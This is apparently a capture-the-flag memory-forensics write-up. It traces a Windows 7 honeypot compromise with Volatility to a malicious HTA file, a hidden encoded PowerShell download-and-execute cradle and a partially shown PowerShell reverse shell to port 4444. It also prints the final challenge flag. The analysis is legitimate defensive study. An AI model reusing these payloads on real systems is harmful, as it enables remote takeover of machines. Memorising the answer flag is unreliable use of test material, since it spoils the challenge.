	# Description
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?  
  
1. Find the full URL used to download the malware.  
2. Find the malicious's process ID.  
3. Find the attackers IP  
  
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}  
Download Link: http://46.101.25.140/forensics_honeypot.zip

# Challenge
- Unzipping the file it contains `honeypot.raw` sized at 1.1GB
- Using `strings` on the file, it contains tons of lines.
- Checking with `fdisk -l` it doesn't seem to be a disk image, so it's probably a memory dump?
- We can load the memory dump  in `volatility`
- I'm not good with memory forensics, so I'll follow [this tutorial](https://newtonpaul.com/malware-analysis-memory-forensics-with-volatility-3/#Using_Volatility)
- First we list out all running process using `windows.pslist.PsList`
- From there we can look at interesting process running.
- Now we can move on to see what networks we connected to.
- There's a few IP's we found
```txt
204.79.197.203 
95.100.210.141 
212.205.126.106
172.67.177.22  
147.182.172.189
93.184.220.29 
```
```txt
204.79.197.203 
```
Was flagged as malicious by  1 vendor.
```txt
93.184.220.29 
```
Was flagged as malicious by 2 vendor.
- With volatility 3 there is no option to dump internet history, so we need to use volatility 2 for this the command for this is `iehistory`
- Looking at the history, there is only one that looks suspicious
```txt
Location: Visited: Santa@https://windowsliveupdater.com/christmas_update.hta
```
- Now that we know that URL, let's find the file on the system, this can be done with `filescan`
- Now let's search for `christmas_update.hta`
```txt
0x000000003f4d4348      2      0 -W-rwd \Device\HarddiskVolume1\Users\Santa\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M3FMRSOD\christmas_update[1].hta
```
- Now let's try to dump the file using `dumpfiles` with the offset.
```html
<html>
<head>
<HTA:APPLICATION id="Microsoft" applicationName="Christmas update"/>
<script>
var sh = new ActiveXObject("WScript.Shell");
sh.run('powershell.exe /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==');
window.close();
</script>
</html>
```
- Found this interesting line
```txt
powershell.exe	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
```
base64 encoded
```txt
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
```
- So It's downloading a powershell script.
- Looking back at our `psList`, PowerShell is running with PID 2700
- We can dump the memory of PowerShell using `memdump` by supplying the PID.
- The dump is not that readable so use `strings` to make it better.
- If we search for `update.ps1` we'll find the request being made.
```ps
GET /update.ps1 HTTP/1.1
Host: windowsliveupdater.com
Connection: Keep-Alive
"j0h
"jDi
"j<j
Cloudflare, Inc.1 0
Cloudflare Inc ECC CA-30
210517000000Z
220516235959Z0u1
California1
San Francisco1
Cloudflare, Inc.1
sni.cloudflaressl.com0Y0
(ix=
windowsliveupdater.com
sni.cloudflaressl.com
*.windowsliveupdater.com0
t0r07
1http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
1http://crl4.digicert.com/CloudflareIncECCCA-3.crl0>
70503
0)0'
http://www.digicert.com/CPS0v
j0h0$
http://ocsp.digicert.com0@
4http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
M]&\%]
YU$V
 	gF
?xR!
\Dw#
"jt:
`HTTP/1.1 200 OK
Date: Thu, 25 Nov 2021 19:13:46 GMT
Content-Type: application/octet-stream
Content-Length: 505
Connection: keep-alive
last-modified: Thu, 25 Nov 2021 18:39:35 GMT
etag: "619fd867-1f9"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lgmogUDZhWNbaKDp9khWTT01tuMkibt7NKtJIq83%2BoppMmkhAi7AVQroff%2FhACgijFiykEluctNJ4GFZRCeDCgpNf42eYRQ5su8vSZnWUQEjYJFUpLo7ImRWXpqxXjkzPHrHx6XKl%2BUD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6b3d3239c9006f73-ATH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
$client = New-Object System.Net.Sockets.TCPClient('147.182.172.189',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 
```
- At the end we see a PowerShell command being ran.
```ps
$client = New-Object System.Net.Sockets.TCPClient('147.182.172.189',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 
```
- We can also find the attackers IP in the command, we all that, we can construct our flag.

`HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}`
```txt
HTB{echo -n "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189" | md5sum}
```
HTB{969b934d7396d043a50a37b70e1e010a} is our final flag.

# Conclusion
`christmas_update.hta` was used to drop the malware into the system by downloading `update.ps1` which is a powershell script which creates a reverse-shell back to 147.182.172.189 on port 4444


